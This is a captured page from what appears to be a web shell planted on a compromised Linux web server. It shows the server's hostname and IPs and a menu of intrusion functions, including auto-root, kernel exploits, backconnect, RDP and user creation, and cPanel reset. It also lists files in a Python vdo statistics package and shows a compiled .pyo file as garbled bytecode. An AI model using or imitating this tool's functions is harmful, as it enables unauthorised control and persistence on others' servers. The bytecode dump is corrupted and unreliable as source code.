Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 18.191.198.245
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
python2.7 /
site-packages /
vdo /
statistics /
[ HOME SHELL ]
Name
Size
Permission
Action
Command.py
1.5
KB
-rw-r--r--
Command.pyc
1.41
KB
-rw-r--r--
Command.pyo
1.41
KB
-rw-r--r--
Field.py
6.96
KB
-rw-r--r--
Field.pyc
10.93
KB
-rw-r--r--
Field.pyo
10.93
KB
-rw-r--r--
KernelStatistics.py
6.1
KB
-rw-r--r--
KernelStatistics.pyc
5.88
KB
-rw-r--r--
KernelStatistics.pyo
5.88
KB
-rw-r--r--
LabeledValue.py
3.58
KB
-rw-r--r--
LabeledValue.pyc
4.97
KB
-rw-r--r--
LabeledValue.pyo
4.97
KB
-rw-r--r--
StatFormatter.py
8.32
KB
-rw-r--r--
StatFormatter.pyc
9.52
KB
-rw-r--r--
StatFormatter.pyo
9.52
KB
-rw-r--r--
StatStruct.py
10.06
KB
-rw-r--r--
StatStruct.pyc
11.35
KB
-rw-r--r--
StatStruct.pyo
11.35
KB
-rw-r--r--
VDOReleaseVersions.py
1.07
KB
-rw-r--r--
VDOReleaseVersions.pyc
1.29
KB
-rw-r--r--
VDOReleaseVersions.pyo
1.29
KB
-rw-r--r--
VDOStatistics.py
11.58
KB
-rw-r--r--
VDOStatistics.pyc
9.73
KB
-rw-r--r--
VDOStatistics.pyo
9.73
KB
-rw-r--r--
__init__.py
1.14
KB
-rw-r--r--
__init__.pyc
650
B
-rw-r--r--
__init__.pyo
650
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : StatFormatter.pyo
� .�t_c @ sB d Z d d l Z d e f d � � YZ d e f d � � YZ d S( sc DisplaySpec $Id: //eng/vdo-releases/magnesium/src/python/vdo/statistics/StatFormatter.py#1 $ i����Nt StatFormatterc B s/ e Z d Z e e d � Z d � Z d � Z RS( s� An object which formats labeled values. Formatters are able to represent all of the verbose formatting for vdoStats and vdoMonitor (the df-style formatting in vdoStats is done by hand). A formatter is specified by supplying a description of the format for each level of the hierarchy of labeled values. If the values have more levels than the formatter has specified, the final level specification will be applied to all remaining value levels. A level specification is specified as a hash with any of the following keys: displayFilter: A function which takes a LabeledValue and return True if that value (and its children) should be displayed. Defaults to a tautology. indent: The additional indentation to apply from this level down. Defaults to no additional indentation. joiner: The string to use for joining label-value pairs at the current level. In YAML mode, defaults to a newline, otherwise defaults to a space. namer: The way of naming the current level. Can be any of these: None: Don't name this level list: A list of indexes into the value list at this level, the name of the level will be the concatenation of the values at those indexes. If the first element of the list is a string, it will be used as a prefix for the name. '=': Use the label of the value at this level as the name, use an equals sign to connect the name to the values '+': Use the label of the value at this level as the name, regardless of the formatter's mode string: Any other string will be used as the name True: Any other true value will use the label as the name if the mode indicates that the level should be named and otherwise won't name the level (non-hierarchical, multivalued levels don't get named). c C s� | | _ | | _ d | _ | j � x&